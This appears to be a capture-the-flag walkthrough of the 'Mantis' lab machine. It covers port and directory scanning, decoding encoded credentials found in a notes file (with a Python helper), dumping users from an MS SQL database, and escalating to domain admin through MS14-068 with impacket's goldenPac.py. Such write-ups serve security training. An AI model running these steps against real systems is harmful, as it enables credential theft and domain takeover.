Basic information

Port scan

A full-port scan is required: port 1337, which is used later, is not covered by the default port range:

$ nmap -p- 10.10.10.52
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-18 13:39 CST
Nmap scan report for 10.10.10.52
Host is up (0.067s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1337/tcp open waste
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
8080/tcp open http-proxy
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49164/tcp open unknown
49165/tcp open unknown
49168/tcp open unknown
50255/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 903.78 seconds

8080

It is an Orchard blog:

Requesting any non-existent path produces a 404 page that exposes the login link:

1337

Visiting it directly shows the IIS default page:

Directory scan

A directory scan of port 1337 finds one directory:

gobuster dir -u http://10.10.10.52:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
...
/secure_notes (Status: 301)
...

dev_notes

This is an OrchardCMS-related document that contains the admin password information:

dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt

1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

# many blank lines follow here; the lines below are at the very bottom of the page
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

blog admin password

The string above is the password written out in binary; decoding it gives the password:

@dm!n_P@ssW0rd!

But this admin interface offers nothing exploitable:

sql password

In addition, base64-decoding the token in the filename and then hex-decoding the result yields the database password; the username is admin:

m$$ql_S@_P@ssW0rd!
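The note calls this "secure format", but both values are protected only by encoding, not by encryption. The following is an added example, not part of the original writeup, that recovers both mechanically: it decodes the 8-bit binary string from the note body and peels the base64-then-hex layers off the token in the dev_notes filename; the generic layer-peeling loop and the helper names are my own.

```python
import base64
import binascii
import re

# Constructed sample input, copied from the dev_notes file quoted above:
# the filename carries a base64-of-hex token, the body an 8-bit binary string.
NOTE_FILENAME = "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt"
NOTE_BITS = ("0100000001100100011011010010000101101110010111110101000001000000"
             "01110011011100110101011100110000011100100110010000100001")


def decode_bit_string(bits: str) -> str:
    """Turn a run of 0/1 characters into ASCII text, 8 bits per character."""
    if len(bits) % 8 != 0 or not re.fullmatch(r"[01]+", bits):
        raise ValueError("not a whole number of 8-bit groups")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")


def extract_filename_token(filename: str) -> str:
    """Pull the encoded chunk out of a name shaped like dev_notes_<token>.txt.txt."""
    m = re.search(r"dev_notes_([A-Za-z0-9+/=]+)\.txt", filename)
    if not m:
        raise ValueError("filename carries no encoded token")
    return m.group(1)


def peel_encodings(token: str) -> list:
    """Strip recognisable text encodings (hex, then base64) layer by layer until
    the value no longer looks encoded. Returns every layer, outermost first.
    Hex is tried before base64 because any even-length hex string is also
    syntactically valid base64; the loop is bounded and a decode only counts
    as a layer when it yields printable ASCII."""
    layers = [token]
    current = token
    for _ in range(8):  # bound the loop; real-world nesting is shallow
        nxt = None
        try:
            if re.fullmatch(r"(?:[0-9a-fA-F]{2})+", current):
                nxt = binascii.unhexlify(current).decode("ascii")
            elif len(current) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", current):
                nxt = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            nxt = None
        if nxt is None or not nxt.isprintable():
            break
        layers.append(nxt)
        current = nxt
    return layers
```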

orcharddb

Then connect to the database and look around; this yields a username and password:

SELECT name FROM master.dbo.sysdatabases;
SELECT * FROM orcharddb.INFORMATION_SCHEMA.TABLES;
SELECT * FROM orcharddb.INFORMATION_SCHEMA.COLUMNS;
USE orcharddb;
SELECT * FROM blog_Orchard_Users_UserPartRecord;

james@htb.local james J@m3s_P@ssW0rd!

MS14-068

The james account can log in over RPC to gather some information, but cannot obtain a shell via WMI, PsExec or similar:

➜  Mantis rpcclient -U htb.local/james 10.10.10.52
Enter HTB.LOCAL\james's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
rpcclient $>

After some searching, try MS14-068:

goldenPac

A hosts entry needs to be added first:

10.10.10.52 htb.local mantis.htb.local

This can be done step by step, or in one shot with goldenPac.py, which ships with impacket:

python3 goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local

flags

Then read user.txt and root.txt directly:

type C:\Users\james\desktop\user.txt
type C:\Users\administrator\desktop\root.txt

References